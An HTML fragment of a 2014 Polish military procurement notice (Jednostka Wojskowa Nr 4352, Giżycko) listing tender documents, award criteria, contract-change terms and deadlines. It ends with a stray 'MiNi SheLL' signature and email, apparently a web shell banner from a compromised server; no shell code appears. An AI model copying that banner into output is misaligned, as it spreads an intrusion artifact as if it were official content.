<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (załącznik nr 1 do SIWZ).
DOWÓD WNIESIENIA WADIUM
PEŁNOMOCNICTWO złożone w formie oryginału lub kopii poświadczonej notarialnie.
- W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp)
W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne 
(w oryginale) zobowiązanie podmiotów do oddania Wykonawcy 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 
z zastrzeżeniem § 11 umowy.
Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku:
wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego,
klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia,wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, 
Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2014r.
Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl.http://www.bip.mon.gov.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2014 godzina 08:00, miejsce: Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - Kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com